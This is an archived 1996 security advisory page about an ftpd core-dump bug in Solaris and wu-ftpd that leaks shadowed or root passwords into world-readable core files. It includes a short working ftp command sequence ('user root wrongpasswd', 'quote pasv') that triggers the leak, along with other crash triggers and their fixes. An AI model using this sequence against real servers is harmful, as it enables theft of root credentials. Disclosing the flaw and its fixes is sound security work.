Solaris (and others) ftpd core dump bug
|Description:||Solaris ftpd (as well as others) can be made to core dump and divulge shadowed passwords|
|Compromise:||Can obtained crypt()ed root password |
|Vulnerable Systems:||Solaris (at least 2.5) and others including wu.ftpd. If enclosed doesn't work, try killing the process yourself. |
|Date:||15 October 1996 |
|Notes:||See addendum |
From: Martin Rex (email@example.com)
Date: Tue, 15 Oct 1996 18:14:08 -0400
James Poland 6-5251 wrote:
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?
Killing from the command line doesn't seem to work, but:
logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
voila, root password in world readable core dump under /tmp
PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
so the seem to have used the proposed fix
Checking for "pw != NULL"
So this proposal was simple and obvious ... and incomplete. :)
Addendum: Other ftpd bugs:
FromVadim Kolontsov (firstname.lastname@example.org)
Date: Tue, 15 Oct 1996 08:41:40 +0300
wuftpd can create core dump in two following situation too (yes, dump
will contain some subset of shadowed passwords):
1) "pasv" given when user not logged in
(caused by error in passive())
2) more than 100 arguments to any executable command (for example, "list")
(caused by error in ftpd_popen())
First error presents in almost all version of bsd's ftpd, wu-ftpd and
derived. Second error presents in all versions of bsd's ftpd, wu-ftpd and
derived (as far as I know).
Bugfixes are simple. Checking for "pw != NULL" in first case, and
checking for "argc < 100" in another one (see sources).
Best regards, Vadim.
P.S. By the way, who knows e-mail of wu-ftpd developer? Mail me, pls...
Vadim Kolontsov SysAdm/Programmer
Tver Regional Center of New Information Technologies Networks Lab
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: